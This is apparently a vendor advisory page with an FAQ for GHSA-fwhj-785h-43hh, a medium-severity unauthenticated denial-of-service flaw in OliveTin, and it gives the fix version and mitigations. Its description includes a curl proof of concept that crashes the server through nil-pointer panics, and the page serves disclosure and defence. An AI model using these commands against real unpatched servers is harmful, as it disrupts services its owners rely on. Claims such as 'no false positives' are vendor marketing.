How severe is GHSA-fwhj-785h-43hh?

GHSA-fwhj-785h-43hh has a CVSS score of 5.3/10, rated MEDIUM. Review your exposure and patch according to your risk tolerance.

Which packages are affected by GHSA-fwhj-785h-43hh?

GHSA-fwhj-785h-43hh affects the following packages: github.com/OliveTin/OliveTin (Go). Ecosystems affected: Go.

How do I fix GHSA-fwhj-785h-43hh?

Update github.com/OliveTin/OliveTin to 0.0.0-20260304225158-bb14c5da3e64 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-fwhj-785h-43hh is resolved across your whole dependency graph.

How do I detect GHSA-fwhj-785h-43hh in my Go dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/OliveTin/OliveTin. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-fwhj-785h-43hh if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-fwhj-785h-43hh?

O3 pinpoints whether GHSA-fwhj-785h-43hh is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-fwhj-785h-43hh actively exploited in the wild?

No public exploit code has been indexed for GHSA-fwhj-785h-43hh yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

When was GHSA-fwhj-785h-43hh published, and has it been updated?

GHSA-fwhj-785h-43hh was published on March 5, 2026 and was last updated on March 23, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

🐹 Go

GHSA-fwhj-785h-43hh

MEDIUM

OliveTin has crash on NPE by calling APIs with invalid bindings or log references

Also known asGO-2026-4621

Published

Mar 5, 2026

Updated

Mar 23, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

Blast Radius

1 pkg affected

🐹github.com/OliveTin/OliveTin

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

Summary

An unauthenticated attacker can trigger server-side panics by first creating an execution log entry with a nil binding via StartActionByGet (invalid action ID), then calling KillAction or RestartAction on that tracking ID. This causes a nil-pointer dereference in API handlers and results in repeated per-request panics (Empty reply from server), enabling denial of service through panic/log/CPU amplification.

Details

The issue is caused by this flow:

StartActionByGet accepts arbitrary actionId and still calls executor:
- service/internal/api/api.go:239
Executor stores a log entry before binding validation:
- service/internal/executor/executor.go:519
If binding is nil, execution stops, but the log entry remains:
- service/internal/executor/executor.go:781
KillAction dereferences execReqLogEntry.Binding.Action without checking Binding:
- service/internal/api/api.go:79
RestartAction has the same unsafe dereference:
- service/internal/api/api.go:1285

Because the dereference happens before authorization checks in these handlers, this is reachable unauthenticated.

PoC

Environment:

OliveTin default single frontend on http://localhost:1337
Reproduced on main (commit 235493e) and tag 3000.11.0

Create orphan tracking ID with invalid action:

T=$(curl -s -X POST http://localhost:1337/api/StartActionByGet \
  -H 'Content-Type: application/json' \
  --data '{"actionId":"does-not-exist"}' \
  | sed -n 's/.*"executionTrackingId":"\([^"]*\)".*/\1/p')
echo "$T"

2. Trigger panic in RestartAction:

curl -v -X POST http://localhost:1337/api/RestartAction \
  -H 'Content-Type: application/json' \
  --data "{\"executionTrackingId\":\"$T\"}"

3. Trigger panic in KillAction:

curl -v -X POST http://localhost:1337/api/KillAction \
  -H 'Content-Type: application/json' \
  --data "{\"executionTrackingId\":\"$T\"}"

Observed client output:

- curl: (52) Empty reply from server

Observed server log:

- panic serving ... runtime error: invalid memory address or nil pointer dereference
- stack points to:
    - service/internal/api/api.go:79 (KillAction)
    - service/internal/api/api.go:1285 (RestartAction)

Impact

This is an unauthenticated denial-of-service vulnerability (panic-based request disruption and log/CPU amplification). An attacker can repeatedly trigger panics remotely without credentials, degrading service reliability and observability.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
🐹Go	`github.com/OliveTin/OliveTin`	all versions	0.0.0-20260304225158-bb14c5da3e64

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/OliveTin/OliveTin. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/OliveTin/OliveTin to 0.0.0-20260304225158-bb14c5da3e64 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-fwhj-785h-43hh is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-fwhj-785h-43hh is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-fwhj-785h-43hh. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary An unauthenticated attacker can trigger server-side panics by first creating an execution log entry with a nil binding via `StartActionByGet` (invalid action ID), then calling `KillAction` or `RestartAction` on that tracking ID. This causes a nil-pointer dereference in API handlers and results in repeated per-request panics (`Empty reply from server`), enabling denial of service through panic/log/CPU amplification. ### Details The issue is caused by this flow: 1. `StartActionByGet` accepts arbitrary `actionId` and still calls executor: - `service/internal/api/api.go:239`

O3 Security · Impact-Aware SCA

Is GHSA-fwhj-785h-43hh in your dependencies?

O3 detects GHSA-fwhj-785h-43hh across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works